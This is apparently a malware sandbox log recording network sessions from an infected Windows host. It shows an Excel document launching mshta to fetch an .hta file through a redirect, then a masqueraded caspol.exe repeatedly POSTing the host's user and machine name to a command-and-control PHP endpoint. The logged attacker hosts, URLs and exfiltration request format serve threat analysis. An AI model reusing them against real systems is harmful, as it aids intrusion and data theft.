Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
66          192.168.2.22  49235        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:02.405973911 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:02.410938978 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:03.142828941 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:03 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
67          192.168.2.22  49236        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:03.276879072 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:03.281827927 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:04.012312889 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:03 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
68          192.168.2.22  49237        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:04.148475885 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:04.153650999 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:05.015336037 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
69          192.168.2.22  49238        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:05.165608883 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:05.170720100 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:05.888010025 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
70          192.168.2.22  49239        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:06.037022114 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:06.042036057 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:06.878705025 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
71          192.168.2.22  49240        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:07.027129889 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:07.032370090 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:07.903635025 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:08.073318958 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:08.079653025 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:08.914391994 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.22 | 49242 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:09.070729971 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:09.075720072 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:09.790751934 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.22 | 49243 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:09.948055029 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:09.961206913 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:10.690216064 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.22 | 49244 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:10.836560011 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:10.842150927 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:11.686970949 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.22 | 49245 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:11.843614101 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:11.848536968 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:12.561392069 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.22 | 49246 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:12.733412027 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:12.738338947 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:13.441821098 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.22 | 49247 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:13.590063095 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:13.595288038 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:14.312865973 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.22 | 49248 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:58:14.443617105 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:58:14.448889017 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:58:15.160309076 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 198.244.140.41 | 443 | 3192 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:56:32 UTC | 386 | OUT | GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-20 06:56:32 UTC | 468 | IN | HTTP/1.1 302 Found
Content-Length: 120
Content-Type: text/plain; charset=utf-8
Date: Wed, 20 Nov 2024 06:56:32 GMT
Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-20 06:56:32 UTC | 120 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 198.244.140.41 | 443 | 3492 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:56:35 UTC | 410 | OUT | GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-20 06:56:35 UTC | 468 | IN | HTTP/1.1 302 Found
Content-Length: 120
Content-Type: text/plain; charset=utf-8
Date: Wed, 20 Nov 2024 06:56:35 GMT
Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-20 06:56:35 UTC | 120 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49175 | 198.244.140.41 | 443 | 3192 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:57:05 UTC | 386 | OUT | GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-20 06:57:05 UTC | 468 | IN | HTTP/1.1 302 Found
Content-Length: 120
Content-Type: text/plain; charset=utf-8
Date: Wed, 20 Nov 2024 06:57:05 GMT
Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-20 06:57:05 UTC | 120 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.2249179198.244.140.414433424C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-20 06:57:10 UTC410OUTGET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-US
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: provit.uk
                                                                    Connection: Keep-Alive
                                                                    2024-11-20 06:57:10 UTC | 468 bytes | IN | HTTP/1.1 302 Found
                                                                    Content-Length: 120
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 20 Nov 2024 06:57:10 GMT
                                                                    Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 0
                                                                    Connection: close
                                                                    2024-11-20 06:57:10 UTC | 120 bytes | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta



                                                                    Target ID:0
                                                                    Start time:01:56:08
                                                                    Start date:20/11/2024
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                    Imagebase:0x13f4a0000
                                                                    File size:28'253'536 bytes
                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:01:56:32
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                    Imagebase:0x13f8b0000
